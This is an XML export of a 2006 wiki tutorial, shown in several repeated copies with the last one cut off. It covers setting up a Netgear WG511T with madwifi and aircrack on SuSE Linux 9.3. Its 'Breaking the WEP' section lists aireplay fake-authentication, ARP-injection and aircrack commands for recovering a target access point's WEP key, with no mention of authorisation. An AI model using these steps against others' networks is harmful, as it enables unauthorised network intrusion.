<odd>
<entity uuid="http://www.divexit.de/export/opendd/70/" class="object" subclass="page" published="Thu, 11 Dec 2008 16:15:41 +0100" />
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/owner_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="owner_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/3/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/container_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="container_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/3/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/site_uuid/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="site_uuid" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[http://www.divexit.de/export/opendd/1/]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/time_updated/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="time_updated" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[1229953940]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/title/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="title" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[Installation manual for the WG511T on SuSE Linux 9.3 incl. WEP-Key breaking]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/attr/description/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="description" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/volatile/renderedentity/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="renderedentity" type="volatile" ><![CDATA[	
	<div class="contentWrapper">	
	<div id="pages_page">
	
<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface:
<dl>
<dd> <strong>ifconfig ath0 down</strong> </dd>
</dl>
</li>
<li> Unload all old atheros modules:
<dl>
<dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd>
</dl>
</li>
<li> Delete all old atheros modules:
<dl>
<dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd>
<dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd>
</dl>
</li>
<li> Change to an installation directory of your choice (e.g. /usr/src/):
<dl>
<dd> <strong>cd /usr/src/</strong> </dd>
</dl>
</li>
<li> Download the necessary sources:
<dl>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />linux/<wbr />atheros/<wbr />madwifi-cvs-20051025.tgz</a></a></strong> </dd>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />linux/<wbr />patches/<wbr />madwifi-cvs-20051025.patch</a></a></strong> </dd>
<dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz"<a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" style="text-decoration:underline;">http:/<wbr />/<wbr />www.tuto-fr.com/<wbr />tutoriaux/<wbr />crack-wep/<wbr />fichiers/<wbr />wlan/<wbr />aircrack/<wbr />aircrack-2.41.tgz</a></a></strong> </dd>
</dl>
</li>
<li> Extract the sources and patch them:
<dl>
<dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd>
<dd> <strong>cd madwifi-cvs-20051025</strong> </dd>
<dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd>
</dl>
</li>
<li> Check your kernel-version:
<dl>
<dd> <strong>uname -r</strong> </dd>
</dl>
</li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"):
<dl>
<dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd>
<dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd>
</dl>
</li>
<li> Extract the aircrack packet:
<dl>
<dd> <strong>cd..</strong> </dd>
<dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd>
<dd> <strong>cd aircrack-2.41</strong> </dd>
</dl>
</li>
<li> Compile aircrack:
<dl>
<dd> <strong>make</strong> </dd>
<dd> <strong>make install</strong> </dd>
</dl>
</li>
<li> Reboot your system, insert the card and then load the new module with the following command:
<dl>
<dd> <strong>modprobe ath_pci</strong> </dd>
</dl>
</li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point):
<dl>
<dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd>
</dl>
</li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"):
<dl>
<dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd>
</dl>
</li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point):
<dl>
<dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd>
</dl>
</li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"):
<dl>
<dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd>
</dl>
</li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"):
<dl>
<dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd>
</dl>
</li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file:
<dl>
<dd> <strong> aircrack [PREFIX].cap</strong> </dd>
</dl>
</li>
</ol>
<p><a></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <span>WG511T</span> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p> Author: Markus H.</p>
		<!-- display tags -->
		<p class="tags">
			<a rel="tag" href="http://www.divexit.de/pg/search/?q=wg511t&search_type=tags">wg511t</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=suse&search_type=tags">suse</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=wep&search_type=tags">wep</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=crack&search_type=tags">crack</a>, <a rel="tag" href="http://www.divexit.de/pg/search/?q=it+security&search_type=tags">it security</a>		</p>
		

	<p class="strapline">
		Last updated <acronym title="22 December 2008 @ 2:52pm">22 December 2008</acronym> by <a href="http://www.divexit.de/pg/view/3">darklevel</a>	</p>
</div>

</div>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/20/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:15:41 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><a name="B000MQC8IO" href="http://amazon.de/gp/product/B000MQC8IO?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B000MQC8IO&amp;adid=cca3b9f7-9427-46af-baba-31c665fefd65" target="_blank">SuSE Linux</a> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<table id="toc" class="toc" border="0" summary="Contents">
<tbody>
<tr>
<td>
<ul style="none;">
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#I.27m_using_the_following_hardware:"><span class="tocnumber">1</span> <span class="toctext">I'm using the following hardware:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#..and_the_following_software:"><span class="tocnumber">2</span> <span class="toctext">..and the following software:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Packet_and_driver_installation:"><span class="tocnumber">3</span> <span class="toctext">Packet and driver installation:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Breaking_the_WEP:"><span class="tocnumber">4</span> <span class="toctext">Breaking the WEP:</span></a><br /><br /></li>
<li class="toclevel-1"><a href="http://www.darklevel.org/index.php/Installation_manual_for_the_WG511T_on_SuSE_Linux_9.3_incl._WEP-Key_breaking#Note:"><span class="tocnumber">5</span> <span class="toctext">Note:</span></a><br /><br /></li>
</ul>
<br /></td>
</tr>
</tbody>
</table>
<p>if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); }  <a name="I.27m_using_the_following_hardware:"></a></p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p><a name="..and_the_following_software:"></a></p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p><a name="Packet_and_driver_installation:"></a></p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <a name="1564144518" href="http://amazon.de/gp/product/1564144518?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=1564144518&amp;adid=efe27fa9-58a5-4c17-809c-d8d487ef0183" target="_blank">your system</a> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <a name="B000EQ44L6" href="http://amazon.de/gp/product/B000EQ44L6?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B000EQ44L6&amp;adid=70b90bb3-39ff-407f-9a9d-abf695b07720" target="_blank">the following</a> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
<li> Extract the aircrack packet: <dl><dd> <strong>cd..</strong> </dd><dd> <strong>tar -xvzf aircrack-2.41.tgz</strong> </dd><dd> <strong>cd aircrack-2.41</strong> </dd></dl> </li>
<li> Compile aircrack: <dl><dd> <strong>make</strong> </dd><dd> <strong>make install</strong> </dd></dl> </li>
<li> Reboot your system, insert the card and then load the new module with the following command: <dl><dd> <strong>modprobe ath_pci</strong> </dd></dl> </li>
</ol>
<p>&nbsp;</p>
<p><a name="Breaking_the_WEP:"></a></p>
<h3><span class="mw-headline">Breaking the WEP:</span></h3>
<ol>
<li> Enable monitor mode on your card (substitute [CHANNEL] for the channel-number of the target access-point): <dl><dd> <strong>airmon.sh start ath0 [CHANNEL]</strong> </dd></dl> </li>
<li> Capture packets of the target access point (substitute [PREFIX] for a filename of your choice and [CHANNEL] for the channel-number of the target access-point (e.g. "airodump ath0 dump 7"): <dl><dd> <strong>airodump ath0 [PREFIX] [CHANNEL]</strong> </dd></dl> </li>
<li> Open now another shell window and set the transmit rate to the recommended rate of 5.5 Mbps (you may have to vary the rate according to the distance to the target access point): <dl><dd> <strong> iwconfig ath0 rate 5.5M</strong> </dd></dl> </li>
<li> Initiate a fake authentication on the target access-point (substitute [ESSID] for the essid and [BSSID] for the MAC-address of the target access-point (e.g. "aireplay -1 0 -e airport -a 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong>aireplay -1 0 -e [ESSID] -a [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Start now to grab the necessary ARP packets to inject them to the target access-point (e.g. "aireplay -3 -b 00:12:13:99:98:00 -h 00:11:22:33:44:55 ath0"): <dl><dd> <strong> aireplay -3 -b [BSSID] -h 00:11:22:33:44:55 ath0</strong> </dd></dl> </li>
<li> Now you have to wait for a couple of seconds or even minutes till the data packets (IV's) start to fly in your airodump shell window. </li>
<li> If the network has a 40-bit encryption, you'll need about 200,000 data packets. If it has a 104-bit encryption, you'll need about 800,000-1,000,000 data packets. If you're not sure, you can always run aircrack on the airodump .cap file: <dl><dd> <strong> aircrack [PREFIX].cap</strong> </dd></dl> </li>
</ol>
<p><a name=""></a></p>
<h3><span class="mw-headline">Note:</span></h3>
<p>The data packets (IV's) of my <a name="B0001FXB14" href="http://amazon.de/gp/product/B0001FXB14?ie=UTF8&amp;tag=dief-21&amp;link_code=em1&amp;camp=2510&amp;creative=9342&amp;creativeASIN=B0001FXB14&amp;adid=68d7bb00-ce5a-44be-b7e9-360798861b60" target="_blank">WG511T</a> are rising with a rate of about 600-700 IV's per second.<br /> Version 1.0 / April 18 2006</p>
<p><br /> Author: Markus H.</p>]]></metadata>
<metadata uuid="http://www.divexit.de/export/opendd/70/annotation/21/" entity_uuid="http://www.divexit.de/export/opendd/70/" name="page" type="annotation" owner_uuid="http://www.divexit.de/export/opendd/3/" published="Thu, 11 Dec 2008 16:17:55 +0100" ><![CDATA[<p>The following steps describe the <strong>installation for a Netgear WG511T</strong> (atheros chipset) on <strong><span>SuSE Linux</span> 9.3</strong> and the necessary <strong>procedures to break a WEP-Key</strong>.</p>
<h3><span class="mw-headline">I'm using the following hardware:</span></h3>
<pre>   * Netgear WG511T <span style="color:#66cc66;">(</span>AR <span style="color:#cc66cc;">5212</span><span style="color:#66cc66;">)</span><br />   * Acer Travelmate 6004LCi</pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">..and the following software:</span></h3>
<pre>   * SuSE Linux <span style="color:#cc66cc;">9.3</span> <span style="color:#66cc66;">(</span>with KDE<span style="color:#66cc66;">)</span><br />   * madwifi-cvs<span style="color:#cc66cc;">-20051025</span><br />   * aircrack <span style="color:#cc66cc;">2.41</span></pre>
<p>&nbsp;</p>
<h3><span class="mw-headline">Packet and driver installation:</span></h3>
<ol>
<li> Completely u pdate <span>your system</span> via <strong>Yast</strong> (Software, Online-update). If a <strong>kernel-update</strong> is available make sure you update the kernel and reboot your system. </li>
<li> Install <span>the following</span> RPM's via <strong>Yast</strong> (Software, Installation/removal): <strong>"sharutils", "gcc", "make"</strong> and <strong>"kernel-source"</strong> </li>
<li> Reboot your system. </li>
<li> Update your system again via <strong>Yast</strong> (Online-update) to ensure that the <strong>kernel-source corresponds to your kernel</strong> and then reboot the system. </li>
<li> Switch off an already existing atheros interface: <dl><dd> <strong>ifconfig ath0 down</strong> </dd></dl> </li>
<li> Unload all old atheros modules: <dl><dd> <strong>rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Delete all old atheros modules: <dl><dd> <strong>find /lib/modules -name 'ath*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd><dd> <strong> find /lib/modules -name 'wlan*' -exec rm -v {} \; 2&gt;/dev/null</strong> </dd></dl> </li>
<li> Change to an installation directory of your choice (e.g. /usr/src/): <dl><dd> <strong>cd /usr/src/</strong> </dd></dl> </li>
<li> Download the necessary sources: <dl><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-20051025.tgz</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-20051025.patch</a></strong> </dd><dd> <strong>wget <a href="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz" title="http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz">http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/aircrack/aircrack-2.41.tgz</a></strong> </dd></dl> </li>
<li> Extract the sources and patch them: <dl><dd> <strong>tar -xvzf madwifi-cvs-20051025.tgz</strong> </dd><dd> <strong>cd madwifi-cvs-20051025</strong> </dd><dd> <strong>patch -Np1 -i ../madwifi-cvs-20051025.patch</strong> </dd></dl> </li>
<li> Check your kernel-version: <dl><dd> <strong>uname -r</strong> </dd></dl> </li>
<li> Compile the sources and install them. Substitute [VERSION] for the string you get via the "uname -r" command (e.g. if you get "2.6.11.4-21.11-default" by "uname -r" you enter "make KERNELRELEASE=2.6.11.4-21.11-default" respectively "make install KERNELRELEASE=2.6.11.4-21.11-default"): <dl><dd> <strong>make KERNELRELEASE=[VERSION]</strong> </dd><dd> <strong>make install KERNELRELEASE=[VERSION]</strong> </dd></dl> </li>
